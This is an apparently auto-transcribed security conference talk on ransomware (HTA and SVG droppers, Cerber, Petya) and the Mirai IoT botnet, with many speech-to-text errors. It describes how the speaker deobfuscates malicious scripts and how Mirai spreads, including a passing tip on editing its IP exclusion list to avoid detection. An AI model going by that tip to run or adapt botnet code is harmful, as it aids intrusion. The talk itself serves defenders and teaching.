Demystifying Ransomware and IoT Threats

thank you for attending my talk this is going to be a two-hour talk so thank you for giving me extra time so 75% of the talk would be about ransomware and IOT 25% would be all about me so this was me when I started in the industry I had long hair now it's gone so currently I'm with RSA I'm the resident principal malware scientist and before that I was with Trend Micro have secure and damballa which is a company founded by Georgia Tech in Atlanta and if you can follow me at twitter and i'm also an author of two books my written botnets advanced malware analysis third book advanced reverse engineering hopefully would come in the next couple

of years and I'm also a co-author of the second edition of hacking exposed mother in with kids if you buy those books all proceeds go to my two kids five to nine college fund so please buy them all right so one thing I learned every time I present is that if you tell it as a story people won't fall asleep and I've had people fall asleep on my presentation so hopefully nobody will fall asleep today so one day a guy named Sam got an email at work by the way I'll go fast so please reserve your questions at the end and then this is what he got so he saw this and he was saying you

know what this is very suspicious since Sam went through education user education training he was able to say you know what I learned this I'll take a look at this email and see what that attachment is all about so the attachment is a zip file but then when you save it extract it it actually looks like this so it's not what the email was saying but since Sam was trained he was able to recognize this and he said oh it's an HT a file and according to the all-knowing Wikipedia an HD file is an HTML executable file introduced in 1999 I was born in 1999 same with Internet Explorer 5 executed by MSHDA that exe and so he was saying

you know what I can take care of this I can look at this I don't need to involve any of our security team so what he did he he was looking through the code so what I'm about to explain here sometimes it works on HD files sometimes it doesn't so I learned this through trial and error so I'm going to go through it in a couple of minutes but you should even I did this with trial and error took me like a couple of days so what I usually do when it when it or not me Sam what Sam did was so he went through the code and usually you would go to the end

and then you'll see some variable declarations and then you just choose one so here you see this I highlighted it and you could see here X key so for me it's all for Sam it means it's probably an X or key so you keep that for now and then you look some more if you look at an if statement or any conditional statement just get the first variable that's there search for it and you'll end up with a function call and usually that function call look for the variable in it usually it's at the end sometimes it's just this variable sometimes there's a plus another variable or plus character copy that look for it again and then we

see it at the end and then what you do with that variable is you alert on it so you add this command line of code after the function and when you run the HT a file you will see something like this it will show you the domain where it's downloading all of the malware or ransomware or whatever bad things it wants to download in your system so the good thing about this is that you're not running it you're not downloading the malware it's just displaying where it comes from which is fairly safe so like for me in my humble opinion it's safe to run this in the production network but of course don't run it in the production network

still run it in your own isolated Network so for that specific example these were the URLs that were revealed so you don't need to actually run the malware in a sandbox or run it anywhere in your test machine you just get this file here and then you'll get the malware sample and then you'll be able to analyze it so that's easier said than done right because once you get the Malheur sample directly from those domains it's going to be encrypted so so they designed it that way so that if somebody tries to scrapes malware samples from the Internet it would be hard for you to analyze it because it would be encrypted that's where the X or

T comes from so it just accelerated with that with the X or T that I showed in the HDL and then you'll have the executable and then you can analyze it they did it that way to avoid any scraping from researchers so that if ever those samples get scraped it will be hard for them to analyze it so what happens in the host it downloads file to temp folder it's encrypted so if you don't have the XOR key you need to download it you need to let it work so that you'll be able to get the malware sample but what usually happens is that once it downloads it to the temp folder it's encrypted it writes

it to the idea to a DLL Exe file and decrypt it using that key which is converted into a 32 byte exit decimal so if you visit my blog in ours a website you'll see there how malware and ransomware uses temp folder so what it does it downloads there the encrypted file it uses the key from the HDA file the set and then write it to a dll or an exe file injects it or just copies itself to a different folder where it gets executed every time the system is rebooted or after the installation control is faster that malware and now it's active in your system alright so Sam was so happy he said you

know what I was able to solve it I don't even need to involve our security team my training work I can ask my employer for another six thousand dollars worth of training in sans because I just proved to them that I was able to solve this problem but of course like every millennial like us it didn't happen unless you post it in facebook right so the next thing he did is he wanted to post it in facebook but then when he logged on to his Facebook page he saw this message so one of his friends send him a message it's not actually a message but it's an SVG file so he clicked on the picture

and this is what he saw like it went a YouTube site you'll definitely know it's fake I'm sorry the pictures not as clear but the URL is not youtube.com so you know already it's fake that's it's downloading an extension so he was saying I know this I've gone through training I know how to solve this and he looked at the the details of that extension and as you will see it's something that really not trustworthy the attackers didn't even spend enough time to make it as believable as they can so most of us here in the room would say you know what yeah everybody knows that this is easy to spot but for non-technical users like our aunts

grandmas moms dads some of them still get fooled like this how many of you got a text message from your relatives saying hey you know what I think I can pay for our vacation next summer because I just met this Nigerian prince and he said I just need to give him this money and then he'll give me this amount of money so he was saying you know what I need to examine this SVG file so what is an SVG file according to Wikipedia it's a scalable vector graphics file it's XML based and it's introduced in 99 again the year I was born and the thing about it when you open that SVG file it's actually a red dot so that tells me

I'm just guessing here I'm not so sure if that's what really the attackers wanted to convey it's like a target so if you see a red dot it's usually a bull's eye it's usually a target so it's just like saying you know what you got this picture now you're marked and when you look at it it has it has a script in it and using the same methodology that we use in the HTA file we're in look at the end you look at the function and you look at the variable like for this one I just tried alerting on the different variables here until I found one that actually would display this so it's an SVG file that points you here

which is actually the fake YouTube website that downloads the extension for you so again he was so happy and he said you know what I'm really an expert I was able to solve two targets that were headed my way so I think I am the man and that's it hope you guys learned something today but nobody's clapping so but wait there's more I think I still have a few more minutes so let's discuss some more by the way our IP to this guy's one of the greatest sellers on TV so he got a snail mail from Grandma of course everybody loves grandma right if your mom says no to you you just go to your grandma and your grandma say yes

like I remember when I was younger oh there's this new a Nintendo Entertainment System and my grandma doesn't know what it is I just told her yeah just give me 60 bucks and then you'll know what it is so usually grandmas will just say yes yes to everything so usually doesn't get anything from Grandma but this time he got a mail and this grandma actually needs help on something so he said you know what my grandma's been kind to me when I was a little kid I'll go save grandma so he went to Grandma's house and then he saw this on grandma's computer so everybody knows this is sir burr by the way when I

made this presentation server was the talk of the town you cannot go anywhere without anybody asking you about server so when you got infected by a ransomware this is funny because some people would say I need you to detect ransomware on my system and I usually tell them you'll know when you have brand somewhere because it will announce itself it will play it will play a like a narration saying your hat you've been victimized and you have to pay this amount of money so once it's in your system usually it's already too late so this is what he got and since he has some experiences with HP a file Sam was taking this with a grain of salt

but still he was reading all of the instructions here and one thing he noticed is that when you look at this it's actually really very helpful it will help you pay for the ransomware and of course everybody heard what Betty is right so acne petia changed the game of ransomware because before petia like big companies would actually pay for something so that they could get their data back but then they realized when that they came they just got played they paid for something they didn't get anything back because petia was a clearly wiper so it destroys her system completely so he was looking at the readme HDA it says here you know what if this address doesn't work you can always

refresh this address right here so let's say you're still thinking two days three days from now you're still taking know what okay I'll pay for this because these files are important and then you find out that this link doesn't work anymore if you just refresh it and then it'll give you a new link and usually it says here that the HDA file is we don't cryptid files are not viruses so the HD file it's saying it's not it's not a malware but of course if it's coming from a threat actor you always take it with a grain of salt right so if you're not sure what it is make sure it's be careful all the time

so the good thing about server is that it has a descriptor and again we played around with this their customer service is actually way way better than real customer service how many of you talk to your phone provider cable provider when you have to wait a long period of time on the phone 45 minutes to an hour send them an email wait a week or so you don't get a response but server they're really very responsive because they wanted to pay like you are their customers so they want to make you happy and then they're also very security conscious so you have to prove you're human when you're when you're contacting them or want to talk to them and then

they offer you like a discounted rate it's available in the next four days twenty three hours and this is what I was talking about the tech support if you have problems and the good thing about server is that it gives you the opportunity to try before you buy like it's a very proven thing when you want to sell a product like in the US they would say you know what you can buy this if thirty days you're not happy can return it some stores actually offer a year some stores even offer a lifetime but of course for them they they just say you know what we'll give you the opportunity to decipher one file so the

good thing about it is that when it comes to grandma's computer she really doesn't have any files on her computer she only has one picture file because most of her pictures are either on albums or on the walls or on top of a mantle of a fireplace how many of you when you go to Grandma's house is like a museum right you open the door like tons of pictures there pictures of your aunts your parents when they were young and then you go upstairs there's pictures lining up the wall going up the stairs so all of the pictures are there so Sam was saying grandma it's good because you only have one picture we don't need to pay for

anything we could just use this there sample to decrypt your picture then you don't need to pay for anything so when it comes to decrypting it you just upload it and then after a few seconds couple of minutes you can download the decrypted file it's awkward there's a zip file and then open it so this is what the decrypted picture file looks like now this is my test JPEG file as you can see I just put everything like a aaaa there sorry this is the encrypted file and this version of observer only decrypts from the 648 position down so it only decrypts that part and i know when it gets decrypted it has to go back to a a a a a all the

time so the decrypted file looks like this so the thing about not only server but other ransomware when they decrypt files they're actually putting it back to its real previous state everything to the last bit even to a date date created date access date opened it puts it back to how it was before it's better than insurance company right so when you have an insurance company they will say oh when you get damaged we'll put it back to how it was before but actually they won't be able to do that but ransomware they're able to do that they'll actually return it back to the previous for it was without so you won't even know that

something happened so if you're a traveling executive you got victimized by ransomware and he decided to pay for it your boss wouldn't know that you got victimized by ransomware because everything would be back to normal so he was saying grandma I'm just curious what's that one picture you don't want to us to see and you're not even printing it it's just on your desktop and this is the picture of Grandma and Grandpa by the way they're not my grandparents they're my neighbor's grandparents so I had to cover their faces so words of advice so for us this is common sense but given my experience with other clients and with people that are not really that

technical but has access to things that will enable malware to move laterally in their organization this is still helpful for them so don't just click on anything if it's too good to be true chances are it's not and back up regularly so most user education usually starts with this so for us it's already common sense but for unfortunately for most people that gets victimized it's not really common for them so Sam was happy and he said you know what it's late I need to go home my girlfriend's waiting for me she's a nightshift nurse so she's probably waiting in my apartment so he got home and he said you know what I just want to relax and chill so I'm not

so sure if in Amsterdam that licks it in chill is it's a thing I don't know what it is so I just heard it yesterday so and then I said you know what let's just Netflix and chill let's put on the first episode season 1 of Game of Thrones where we see Khaleesi expose herself so but then he said you know what nothing is working it's like I wanted to relax with my girlfriend I'm tired from helping grandma and solving to malware problems and nothing's working so he tried other services he tried a SoundCloud Spotify Twitter PayPal and nothing was working everything was unreachable and then as the day unfolds Sam found out because of the outage

there was a botnet going around called Mirai it's a DDoS botnet and the signals or the packets are not coming from your regular desktop or PC or systems it's coming from devices so what is Mariah so it's a malware that infects IOT devices for the purpose of using them in DDoS attacks so it spreads by scanning IP addresses to find vulnerable IOT devices and when it comes to scanning IP addresses it excludes IP ranges of general electric HP the US Postal Service Department of Defense and Ayana I would understand they would skip DoD but I'm not so sure why they would skip the other companies here I'm not so sure what that is but it's interesting and it

also uses a remote C&C to determine its DDoS target so you could actually change the target based on the see it based on the command it gets from its CNC channel and when you look at the code this is the IP address exception list so if you want to modify it if you're playing around with it you don't want your company you don't want your company to catch you just put your IP your company IP range there and then it would skip it so how does the attack work so once it finds vulnerable IT devices it brute forces its way into accessing it via a list of com passwords and then once it infects an IT

device it makes sure it makes sure that nobody can communicate with it by closing ssh telnet and HTTP ports it also looks for and removes another IOT malware by the name of anime so the good thing about analyzing malware is that if it's a malware that is competing with another malware chances are it would have the code on how to remove that malware which saves us time because you don't need to reverse that other other malware you just need to get the code from the competing malware try it out and if it works it works similar to during the spy I and Zeus war during the olden times so this is the least the list of common passwords so I have all

of this because the Mirage source code is already public so the good thing about source code being public is that I don't need to reverse it just read the code but then of course it's it's a double-edged sword if it's available there somebody can improve it and release a better version of it for their own purposes so this one it's a honest and pious the one that's claiming that she's the author so senpai is at the Japanese word for upperclassman usually before sensei you become a senpai and then when you're already an expert and you're able to teach other other pupils then you become a sensei so I'm not so sure if there's another sensei on top of

her but for now this is what they're claiming so since the source code was public somebody took that code and attacked Dyne so Dyne is an internet infrastructure company within New Hampshire and the first wave started at 7:00 a.m. Eastern so that 7:00 a.m. in New York and in Atlanta second wave around noon third wave started around p.m. so they were trying to do Netflix and chill in the morning that's why they want their not able to access any of the services they want to access so all of the traffic to dyn's internet directory servers cause it to stop so the ddos there for millions of IP addresses or for millions of IP devices so if you have a camera at home usually

when you look at it it says some cameras have a default broadcast like for me I have cameras at home it has default broadcast I make sure I turn it off because anybody that knows the IP address of my camera can see what what my camera see and I usually put my camera in our guest bathroom so so Mira what happened September 20 2016 krebs website was DDoS Mirai source code with me Diane was DDoS and then after Dan was ddosed Oracle bought Dyne so it's a good business practice and then Krebs identified the alleged moriah author but of course in our world any digital evidence can be faked so even the source country can be faked

everything can be faked so for you to not be a victim of Mirai by the way mirror I just a new wave just came out I think like a week ago or a few days ago I haven't really looked into it yet but it's still around so change default username and password disable the necessary remote access to the IOT device if you just want your phone or your desktop to access it make sure it's the only device that can access your IOT device device device device and us-cert advisory I have it here it's long I won't read it once you have a copy of the slides you just go through it so here it's a mouthful it's

long you have to memorize it so and then Sam realize you know what haven't been doing this just give me a couple of minutes and I'll make sure I put those practice into use and then this is what he saw so this might be the future you might have an IT device that's victimized but by ransomware and say you know what I won't turn on your heater unless you pay me this amount of money or oh I have pictures of you in compromising positions in your camera and I will sell this if you don't pay me this amount of money so Sam was saying this is going to be a very long day the end oh by the way

any questions violent reactions yes sir so you were talking about the the ransomware and that they have this great customer service and that they do everything to get your money they help you out a lot so what change with that yeah so with petia the thing about petty is it's really not ransomware I term it as a wiper because what it did at first it it shows message that you need to pay this or so that and your files have been encrypted but then when you look at the code itself there's no decryption capability what it does it it actually messes up your Master Boot Record so once you get infected by it if you don't have a

backup of it then you won't get your files back and it actually this is from the chatter from the underground it happily messed up the other ransomware operators and it made them mad because now the customers are losing trust on them because they're saying hey we have this really nice business model and pettier came and messed it all up now how will the public trust us so that's what they're saying any other questions yeah thanks for your talk I was wondering you have been working for several antivirus companies and I'm by no means an malware expert but I was wondering why have we as a as a antivirus industry still not solved the issue of well crypto lockers like we

have a lot of behavioral and heuristic detection mechanism these days how come that major antivirus systems like for example McAfee Antivirus security still has not been able to well detect most of these these cryptographic operations and readwrite instructions and those kind of things in nowhere so it's not only a cryptographic malware it's basically malware in general so I had a presentation before I call it the malware Factory Korean I showed live how easy it is to create a new generation of malware and the thing about usually host based systems they would rely on host behavior they would monitor the environment and if there are changes they would use that as a signature and the static signature of the Malheur file

itself and the thing about it is that if you rely on signatures you can just change one thing and then it would totally be different so in my presentation the malware Factory I proved there that I just change one thing and it's a totally new malware again and we call it the green malware made of 100% recycled malware so it's the same thing no matter what even if it's a cryptolocker or whatever they just change something there they deploy it and it becomes new again so right now there's a movement when it got most host security systems are using a machine learning but of course were still far off from achieving that there was a case

I won't say the names of the company were in researcher upload uploaded HelloWorld in in virustotal and some machine learning algorithm of host based systems detected them as a malware so right now when it comes to detecting malware there's so many things you have to insert their product in which is why the presentation about the kill chains earlier it's very helpful because once it's already in the host it means that your network defenses already failed and if it's able to install itself on the host then your endpoint system has failed so unless we find a new way of detecting malware that's not signature based in a better AI or better machine learning algorithm malware will

still try which means job security for all of us I hope answered your question yeah partly by the way when I started in the industry we were only getting like 13 bytes from the malware code before it was enough because it was just DOS malware but then when Windows malware became a reality everything changed a very quick one um you know you talked about you know the grandmother's that you know looking at ransomware and you know what to do and you get all these people but they don't know how to use their computer this is what they say at the end of the day they know how to go out buy Bitcoin and pay for the

ransomware so I don't see how this thing to relate I mean yeah that's right they can't they're they can't go out there the mark the malware offers expect them to go out buy bitcoins and pay them and these people don't know how to open facebook if it's down differently if you either logged out for example so I cannot see this is a little bit of a philosophical question but I think yeah something there that's having a very good question so when it comes to ransomware most of their targets are at the big companies that have like multi-million dollar IP on their system and they have the capability to buy bitcoins before or there's a wave of I would say fake

ransomware scare we're actually had the presentation about it I call it all your Mac's are belong to us we're in their targets are really like the non-technical users they make it very easy for you because they would even have an instruction they're just got the Walmart buy this card input your 16 digit card here or you can use your credit card to pay for it which is easier for most of our non-technical relatives so it's easier to go to Walmart or go to the Western Union monogram and send money or I buy those prepaid cards and like right now the AIA there's a an IRS scam that's been going around again it's an old scam but it's

funny because they would ask you for how about you just pay me in iTunes card or how about it just pay me in google play cards and yep yep yeah which is which is to like most unless you've been exposed to this you wouldn't even know what a Bitcoin is thank you guys thank you [Applause]